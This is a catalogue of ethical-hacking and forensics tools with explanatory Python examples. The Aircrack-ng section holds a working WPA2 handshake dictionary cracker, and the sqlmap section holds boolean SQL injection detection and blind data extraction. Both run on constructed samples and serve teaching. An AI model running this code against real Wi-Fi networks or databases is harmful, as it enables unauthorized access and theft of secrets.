Cybersecurity Tools

Ethical Hacking Tools used for Penetration Testing and Malware Analysis

Aircrack-ng: Wireless WEP/WPA cracking utilities
Aircrack-ng is a complete suite of tools to assess WiFi network security.
Monitoring: Packet capture, export data for further processing by 3rd party tools
Attacking: Replay attacks, deauthentication, fake access points, packet injection
Testing: Checking WiFi cards and driver capabilities (capture and injection)
Cracking: WEP and WPA PSK (WPA 1 and 2)

All tools are command-line, which allows for heavy scripting, and a number of GUIs build on this. It runs primarily on Linux but also on Windows, OS X, FreeBSD, OpenBSD, NetBSD, Solaris and even eComStation 2. Monitor mode and packet injection depend on the wireless driver, which is why the Testing step above matters: outside Linux, capture and injection support is far more limited.
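The cracking step above does not attack the passphrase directly; it attacks the captured 4-way handshake. The Python below is an added example, not aircrack-ng code, that walks through the derivation aircrack-ng performs for every wordlist entry: PMK from passphrase and SSID via PBKDF2, the Key Confirmation Key (first 16 bytes of the PTK) via the 802.11i PRF, and the EAPOL-Key MIC check that confirms a guess. The SSID, MAC addresses, nonces and EAPOL frame body are constructed sample values, not a real capture; the only external reference is the `"password"`/`"IEEE"` PMK test vector from the 802.11 standard.

```python
"""WPA2-Personal handshake cracking as aircrack-ng does it (added example, not aircrack-ng code)."""
import hashlib
import hmac
from typing import Iterable, Optional


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK mapping: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).

    Standard test vector: ("password", "IEEE") -> f42c6fc52df0ebef...23aed762e9710a12e.
    The 4096 HMAC rounds are what makes each wordlist guess expensive.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def wpa2_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Key Confirmation Key: the first 128 bits of the PTK, used to MIC the EAPOL-Key frames."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2) MIC: HMAC-SHA1 over the frame with its MIC field zeroed, 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes,
                    eapol_frame_mic_zeroed: bytes, captured_mic: bytes,
                    wordlist: Iterable[str]) -> Optional[str]:
    """Return the first passphrase whose derived KCK reproduces the captured MIC, else None."""
    for candidate in wordlist:
        # 802.11i passphrases are 8..63 ASCII characters; skipping the rest saves PBKDF2 work
        if not 8 <= len(candidate) <= 63:
            continue
        kck = wpa2_kck(wpa_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_frame_mic_zeroed), captured_mic):
            return candidate
    return None


# Constructed sample handshake (not a real capture): fixed MACs and nonces plus an EAPOL-Key
# message-2 header (version 1, type Key, descriptor RSN, key info 0x010a) over a zeroed body.
SAMPLE_SSID = "TestNet"
SAMPLE_AP_MAC = bytes.fromhex("001122334455")
SAMPLE_STA_MAC = bytes.fromhex("66778899aabb")
SAMPLE_ANONCE = bytes(range(32))
SAMPLE_SNONCE = bytes(range(32, 64))
SAMPLE_EAPOL = bytes.fromhex("0103007502010a") + bytes(114)


def sample_mic(passphrase: str) -> bytes:
    """MIC the constructed frame with a known passphrase so the attack above can be checked."""
    kck = wpa2_kck(wpa_pmk(passphrase, SAMPLE_SSID), SAMPLE_AP_MAC, SAMPLE_STA_MAC,
                   SAMPLE_ANONCE, SAMPLE_SNONCE)
    return eapol_mic(kck, SAMPLE_EAPOL)


if __name__ == "__main__":
    mic = sample_mic("correct horse")
    print(crack_handshake(SAMPLE_SSID, SAMPLE_AP_MAC, SAMPLE_STA_MAC, SAMPLE_ANONCE,
                          SAMPLE_SNONCE, SAMPLE_EAPOL, mic,
                          ["password1", "letmein99", "correct horse"]))
```

Original WPA (key descriptor version 1, TKIP) uses HMAC-MD5 for the MIC instead of HMAC-SHA1, and WPA3-SAE does not use this PBKDF2 derivation at all, so a captured SAE exchange cannot be attacked this way.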

Assemblyline 4
Assemblyline 4 is an open source malware analysis platform. It is designed to help cyber defence teams automate the analysis of files and make better use of security analysts' time. Built on cloud technologies, it scales from small deployments to large enterprise security operations scanning millions of files a day, and it provides triage capabilities.

Assemblyline can be integrated into your environment through its REST API and web interface. The platform comes with dozens of services that provide deep file analysis and integrate with other security platforms such as anti-virus engines, malware detonation sandboxes and threat knowledge bases. Best of all, with a little Python code you can extend it yourself by writing new analysis and integration services.

BeEF: Browser Exploitation Framework
Penetration testing tool that focuses on the web browser. BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors.

BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser.

BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

Operating System: Mac OSX 10.5.0 or higher / modern Linux. Ruby 2.3+ and Gems. SQLite 3.x. Node.js 6+.

Burp Suite Community Edition: Graphical application for web application security
Burp Suite Community Edition is a feature-limited set of manual tools for exploring web security. Proxy your HTTPS traffic, edit and repeat requests, decode data, and more.

For the best experience, use a machine with at least 8 GB of memory and 2 CPU cores. If you are performing large amounts of work, or testing large or complex applications, you may need more memory than this.

If you are new to web security, PortSwigger's Web Security Academy is highly recommended.

Hydra Parallelized Login Cracker
Hydra is a parallelized network login cracker that supports numerous protocols. It is very fast and flexible, and new modules are easy to add. The tool lets researchers and security consultants show how easy it would be to gain unauthorized access to a system remotely. Online password guessing is noisy and can trigger account lockouts, so check lockout policies and rate limits before pointing it at production systems.

It supports: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and MacOS.

Kali Linux
Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali Linux contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering. Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.

Kodachi The Secure OS
Kodachi is based on Ubuntu 18.04.5 and aims to provide a secure, anti-forensic and anonymous operating system with the features a privacy-conscious user needs. Ubuntu 18.04 left standard support in 2023, so check which base the current Kodachi release uses before relying on it.

Kodachi is very easy to use: boot it from a USB drive and you have a fully running operating system with a VPN connection, a Tor connection and a DNSCrypt service already established. No setup or Linux knowledge is required; it has all been automated. The entire OS runs from RAM, so once you shut it down no trace is left behind and all your activity is wiped.

Maltego Community
Maltego is software used for open-source intelligence and forensics, developed by Paterva from Pretoria, South Africa. Maltego focuses on providing a library of transforms for discovery of data from open sources, and visualizing that information in a graph format, suitable for link analysis and data mining.

Maltego uses Java and runs on Windows, Mac and Linux. The client requires a minimum of 4 GB of RAM, 4 GB of disk space and a KVM with a 1080p display; any modern multi-core processor (i3 or above) has more than enough processing power.

Metasploit Project
Metasploit gives you insight backed by a community of well over 200,000 users and contributors and is one of the most widely used penetration testing frameworks. With Metasploit you can uncover weaknesses in your defenses, focus on the highest risks, and improve your security outcomes.

Simulate real-world attacks to find your weak points before a malicious attacker does. The commercial edition, Metasploit Pro, integrates with the open-source Metasploit Framework, giving you access to its exploitation and reconnaissance modules to save effort and accelerate testing. Use attacker techniques to evade antivirus, find weak credentials, and pivot throughout the network.

Metasploit Unleashed
The most complete and in-depth Metasploit guide available, with contributions from the authors of the No Starch Press Metasploit Book. This course is a perfect starting point for Information Security Professionals who want to learn penetration testing and ethical hacking, but are not yet ready to commit to a paid course. We will teach you how to use Metasploit, in a structured and intuitive manner. Additionally, this free online ethical hacking course makes a wonderful quick reference for penetration testers, red teams, and other security professionals.

mitmproxy: Interactive HTTPS Proxy
mitmproxy is your Swiss-army knife for debugging, testing, privacy measurements, and penetration testing. It can be used to intercept, inspect, modify and replay web traffic such as HTTP/1, HTTP/2, WebSockets, and other SSL/TLS-protected protocols. You can prettify and decode a variety of message types ranging from HTML to Protobuf, intercept specific messages on the fly, modify them before they reach their destination, and replay them to a client or server later on.

NetSpot Wi-Fi Site Surveys, Analysis, Troubleshooting
NetSpot is a professional app for wireless site surveys, Wi-Fi analysis and troubleshooting on Mac OS X and Windows, with a free edition. No need to be a network expert to improve your home or office Wi-Fi: all you need is a MacBook running Mac OS X 10.10+ or a laptop with Windows 7/8/10, and NetSpot works over any 802.11 network.

Supports the 2.4 GHz and 5 GHz bands at 20/40/80/160 MHz channel widths.

The Windows build requires .NET Framework 4.5+.

Paid upgrades are a one-time purchase with a Lifetime Upgrade Guarantee.

Nikto2 Command-line Vulnerability Scanner
Nikto scans web servers for dangerous files/CGIs, outdated server software and other problems. It performs generic and server-type-specific checks. It also captures and prints any cookies received.

Nikto is not designed as a stealthy tool. It will test a web server in the quickest time possible, and is obvious in log files or to an IPS/IDS. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).

Any system with a basic Perl installation should be able to run Nikto: Windows (using ActiveState Perl or Strawberry Perl; some POSIX features, such as interactive commands, may not work), Mac OS X, and various Linux and Unix installations (including RedHat, Solaris, Debian, Ubuntu, Kali, etc.).

NIST Cybersecurity Framework
Identify, Protect, Detect, Respond, Recover

These five Functions give the top-level view of how an organization manages cybersecurity risk; each is broken down into Categories and Subcategories that map to informative references. CSF 2.0, published in February 2024, adds a sixth Function, Govern.

The Framework is voluntary guidance, based on existing standards, guidelines, and practices for organizations to better manage and reduce cybersecurity risk. In addition to helping organizations manage and reduce risks, it was designed to foster risk and cybersecurity management communications amongst both internal and external organizational stakeholders.

It will assist in determining which activities are most important to assure critical operations and service delivery. In turn, that will help to prioritize investments and maximize the impact of each dollar spent on cybersecurity.

Nmap: Network Mapper
Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).
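Because Nmap's XML output (`-oX`) is stable and machine-readable, the usual follow-up to repeated scans is to diff them, which is what Ndiff does. The following is an added Python example, not Nmap or Ndiff code, that parses the open ports out of two XML results and reports per host what opened or closed between them; the two embedded XML documents are constructed samples trimmed to the elements the parser uses.

```python
"""Diff two Nmap XML (-oX) results for open-port changes (added example, not Nmap/Ndiff code)."""
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

PortKey = Tuple[str, int]  # (protocol, port number)


def parse_open_ports(nmap_xml: str) -> Dict[str, Dict[PortKey, str]]:
    """Return {ipv4 address: {(proto, port): service name}} for every host reported as up."""
    root = ET.fromstring(nmap_xml)
    hosts: Dict[str, Dict[PortKey, str]] = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") == "ipv4"), None)
        if addr is None:
            continue
        open_ports: Dict[PortKey, str] = {}
        for port in host.findall("./ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not inventory
            service = port.find("service")
            name = service.get("name", "") if service is not None else ""
            open_ports[(port.get("protocol"), int(port.get("portid")))] = name
        hosts[addr] = open_ports
    return hosts


def diff_scans(old_xml: str, new_xml: str) -> Dict[str, Dict[str, List[Tuple[str, int, str]]]]:
    """Per host, list ports that became open or stopped being open between the two scans."""
    old, new = parse_open_ports(old_xml), parse_open_ports(new_xml)
    changes: Dict[str, Dict[str, List[Tuple[str, int, str]]]] = {}
    for host in sorted(set(old) | set(new)):
        before, after = old.get(host, {}), new.get(host, {})
        opened = sorted((proto, port, after[(proto, port)])
                        for (proto, port) in set(after) - set(before))
        closed = sorted((proto, port, before[(proto, port)])
                        for (proto, port) in set(before) - set(after))
        if opened or closed:
            changes[host] = {"opened": opened, "closed": closed}
    return changes


# Constructed sample scans (not real output): one host gains RDP and loses HTTP, a new host appears.
OLD_SCAN = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
    </ports></host>
</nmaprun>"""

NEW_SCAN = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="closed"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
    </ports></host>
  <host><status state="up"/><address addr="10.0.0.9" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports></host>
</nmaprun>"""

if __name__ == "__main__":
    for host, change in diff_scans(OLD_SCAN, NEW_SCAN).items():
        print(host, "opened:", change["opened"], "closed:", change["closed"])
```

Feeding this the output of a scheduled `nmap -oX` run turns Nmap into a cheap exposure monitor: a newly opened 3389/tcp on a host that never had it is exactly the kind of change worth an alert.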

OWASP Offensive Web Testing Framework
OWASP OWTF is a project focused on penetration testing efficiency and alignment of security tests to security standards like the OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST.

See the big picture and think out of the box. More efficiently find, verify and combine vulnerabilities. Have time to investigate complex vulnerabilities like business logic/architectural flaws or virtual hosting sessions. Perform more tactical/targeted fuzzing on seemingly risky areas.

OWTF is developed on Kali Linux and macOS but is made for Kali Linux (or other Debian derivatives). OWTF requires Python 3; Homebrew is required on macOS.

Parrot Security
Parrot is a worldwide community of developers and security specialists that work together to build a shared framework of tools to make their job easier, standardized and more reliable and secure.

Parrot was designed to be a very comfortable environment for security experts and researchers. It includes many basic programs for daily use which pentesting distributions usually exclude (at the cost of less than an additional gigabyte of storage). This choice was taken to make Parrot not only a good system to perform security tests, but also a good environment where you can write reports, build your own tools, and communicate seamlessly with teammates, without the need for additional computers, operating systems or configuration.

Santoku Linux
Santoku is dedicated to mobile forensics, analysis, and security, and packaged in an easy to use, Open Source platform.

A bootable Linux environment designed to make life easier, with tools for examining mobile malware, forensically acquiring and analyzing data, and assessing the security of mobile apps.

sqlmap: Automatic SQL Injection and Database Takeover Tool
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, through fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
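To make concrete what sqlmap automates, here is an added Python example (not sqlmap code) against a constructed in-memory SQLite database. It shows a query that concatenates user input beside its parameterized replacement, detects injection with the same true/false response comparison that sqlmap's boolean-based technique relies on, and then extracts a column value one character at a time by binary search over each code point, which is the blind-extraction pattern sqlmap runs when the application returns no data from the injected query directly.

```python
"""Boolean-based SQL injection detection and blind extraction (added example, not sqlmap code)."""
import sqlite3
from typing import Callable, List

QueryFn = Callable[[sqlite3.Connection, str], List[str]]


def fresh_db() -> sqlite3.Connection:
    """Constructed sample database: two users with a secret column we will try to exfiltrate."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users(name, secret) VALUES (?, ?)",
                     [("alice", "s3cr3t"), ("bob", "hunter2")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> List[str]:
    """Vulnerable: the attacker-controlled string is pasted straight into the SQL text."""
    sql = "SELECT name FROM users WHERE id = " + user_id
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> List[str]:
    """Fixed: the value is type-checked and bound as a parameter, never parsed as SQL."""
    try:
        uid = int(user_id)
    except ValueError:
        return []
    return [row[0] for row in conn.execute("SELECT name FROM users WHERE id = ?", (uid,))]


def is_injectable(query_fn: QueryFn, conn: sqlite3.Connection, base: str = "1") -> bool:
    """Boolean check: a true clause must leave the response unchanged, a false one must change it."""
    try:
        baseline = query_fn(conn, base)
        when_true = query_fn(conn, f"{base} AND 1=1")
        when_false = query_fn(conn, f"{base} AND 1=2")
    except sqlite3.Error:
        return False
    return when_true == baseline and when_false != baseline


def blind_extract(query_fn: QueryFn, conn: sqlite3.Connection, subquery: str,
                  max_len: int = 64) -> str:
    """Recover the string returned by `subquery` using only true/false responses."""
    truthy = query_fn(conn, "1")  # what a true condition looks like from outside

    def holds(cond: str) -> bool:
        try:
            return query_fn(conn, f"1 AND ({cond})") == truthy
        except sqlite3.Error:
            return False

    out = ""
    for pos in range(1, max_len + 1):
        if not holds(f"length(({subquery})) >= {pos}"):
            break  # past the end of the value
        lo, hi = 0, 127  # binary search the ASCII code point: 7 requests per character
        while lo < hi:
            mid = (lo + hi) // 2
            if holds(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    target = "SELECT secret FROM users WHERE name='alice'"
    for fn in (lookup_vulnerable, lookup_safe):
        print(fn.__name__, "injectable:", is_injectable(fn, fresh_db()),
              "extracted:", repr(blind_extract(fn, fresh_db(), target)))
```

The request count is what makes blind extraction slow and noisy (seven requests per character here, plus one length check), which is why sqlmap prefers error-based, UNION or out-of-band channels when the target allows them and falls back to boolean or time-based techniques only when it must.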

Tails: The Amnesic Incognito Live System
Tails is a portable operating system that protects against surveillance and censorship.

Tails is a security-focused Debian-based Linux distribution aimed at preserving privacy and anonymity. All incoming and outgoing connections are forced through Tor, and any non-anonymous connections are blocked. The system is designed to be booted as a live DVD or live USB and leaves no digital footprint on the machine unless explicitly told to do so (through its optional Persistent Storage). Tails also boots with UEFI Secure Boot enabled.

Tsurugi Linux
Tsurugi Linux is a heavily customized Linux distribution based on Ubuntu 16.04 LTS (64-bit, with a custom 5.4.2 kernel) designed to support DFIR investigations, malware analysis and OSINT activities. Since 2019 it has also included a special section dedicated to computer-vision investigations with many custom tools. Ubuntu 16.04 left standard support in April 2021, so check which Ubuntu base the current Tsurugi release uses.

Two repositories (master and development) deliver bug fixes, improvements and custom updates; other security updates come from the official Ubuntu repositories. The main idea behind the Tsurugi Linux project is simplicity, as far as the topics allow, but basic Linux skills are mandatory to work with it correctly and get the most out of it.

Minimum requirements: 2 GHz dual core processor or better. 4 GB system memory. 30 GB of free hard drive space.

w3af: Web Application Attack and Audit Framework
w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework that helps you secure your web applications by finding and exploiting web application vulnerabilities.

Wireshark Network Protocol Analyzer
Wireshark development thrives thanks to the volunteer contributions of networking experts around the globe and is the continuation of a project started by Gerald Combs in 1998.

Features include rich VoIP analysis and the ability to read and write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others.

Capture files compressed with gzip can be decompressed on the fly. Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform). Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2.

Coloring rules can be applied to the packet list for quick, intuitive analysis. Output can be exported to XML, PostScript®, CSV, or plain text. Multi-platform: Runs on Windows, Linux, macOS, Solaris, FreeBSD, NetBSD, and many others.
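The classic libpcap (tcpdump) format that Wireshark reads is simple enough to parse by hand, which is useful for detection tooling that should not depend on a GUI. The following is an added Python example, not Wireshark code, that handles the global header (including the byte-order and nanosecond-timestamp variants), walks the packet records, and decodes Ethernet II/IPv4/TCP headers. `build_sample_pcap()` produces a constructed one-packet capture so it runs offline; its IP and TCP checksums are left at zero, which Wireshark would flag as bad.

```python
"""Minimal libpcap reader with Ethernet/IPv4/TCP decoding (added example, not Wireshark code)."""
import struct
from typing import Any, Dict, List, Optional

TCP_FLAG_NAMES = ["FIN", "SYN", "RST", "PSH", "ACK", "URG", "ECE", "CWR"]  # bit 0 upwards
PCAP_MAGIC_USEC, PCAP_MAGIC_NSEC = 0xA1B2C3D4, 0xA1B23C4D


def decode_ethernet_ipv4_tcp(frame: bytes) -> Optional[Dict[str, Any]]:
    """Decode one Ethernet II frame; return None for anything that is not IPv4/TCP."""
    if len(frame) < 14 or struct.unpack("!H", frame[12:14])[0] != 0x0800:
        return None  # not IPv4 over Ethernet II
    ip = frame[14:]
    if len(ip) < 20 or ip[0] >> 4 != 4:
        return None
    ihl = (ip[0] & 0x0F) * 4  # header length in bytes, options included
    if ip[9] != 6 or len(ip) < ihl + 20:
        return None  # not TCP, or truncated before the TCP header
    sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", ip[ihl:ihl + 14])
    flags = [name for bit, name in enumerate(TCP_FLAG_NAMES) if off_flags & (1 << bit)]
    return {"src": ".".join(map(str, ip[12:16])), "dst": ".".join(map(str, ip[16:20])),
            "sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags}


def read_pcap(data: bytes) -> List[Dict[str, Any]]:
    """Parse a libpcap byte string and return the decoded TCP packets in capture order."""
    magic_le, magic_be = struct.unpack("<I", data[:4])[0], struct.unpack(">I", data[:4])[0]
    if magic_le in (PCAP_MAGIC_USEC, PCAP_MAGIC_NSEC):
        endian, magic = "<", magic_le
    elif magic_be in (PCAP_MAGIC_USEC, PCAP_MAGIC_NSEC):
        endian, magic = ">", magic_be
    else:
        raise ValueError("not a libpcap file (pcapng starts with 0x0a0d0d0a and is a different format)")
    frac_divisor = 1e9 if magic == PCAP_MAGIC_NSEC else 1e6
    _major, _minor, _tz, _sigfigs, _snaplen, linktype = struct.unpack(endian + "HHiIII", data[4:24])
    if linktype != 1:
        raise ValueError(f"only DLT_EN10MB (Ethernet) is handled here, got linktype {linktype}")
    packets, offset = [], 24
    while offset + 16 <= len(data):
        ts_sec, ts_frac, incl_len, orig_len = struct.unpack(endian + "IIII", data[offset:offset + 16])
        frame = data[offset + 16:offset + 16 + incl_len]
        if len(frame) < incl_len:
            break  # capture cut off mid-record: stop instead of decoding garbage
        offset += 16 + incl_len
        decoded = decode_ethernet_ipv4_tcp(frame)
        if decoded is not None:
            decoded["ts"] = ts_sec + ts_frac / frac_divisor
            decoded["truncated"] = incl_len < orig_len  # snaplen clipped the packet
            packets.append(decoded)
    return packets


def build_sample_pcap() -> bytes:
    """Constructed single-packet capture: TCP SYN 10.0.0.1:40000 -> 10.0.0.5:80, checksums zero."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
    tcp = struct.pack("!HHIIHHHH", 40000, 80, 1000, 0, (5 << 12) | 0x002, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0x4000, 64, 6, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 5]))
    frame = eth + ip + tcp
    global_header = struct.pack("<IHHiIII", PCAP_MAGIC_USEC, 2, 4, 0, 0, 65535, 1)
    record = struct.pack("<IIII", 1700000000, 123456, len(frame), len(frame))
    return global_header + record + frame


if __name__ == "__main__":
    for pkt in read_pcap(build_sample_pcap()):
        print(f"{pkt['ts']:.6f} {pkt['src']}:{pkt['sport']} -> {pkt['dst']}:{pkt['dport']} {pkt['flags']}")
```

Wireshark's own dissectors are the reference for anything beyond this (options, IPv6, VLAN tags, pcapng blocks); the value of a hand parser is in batch jobs such as counting SYNs per source over a large capture without loading it into the GUI.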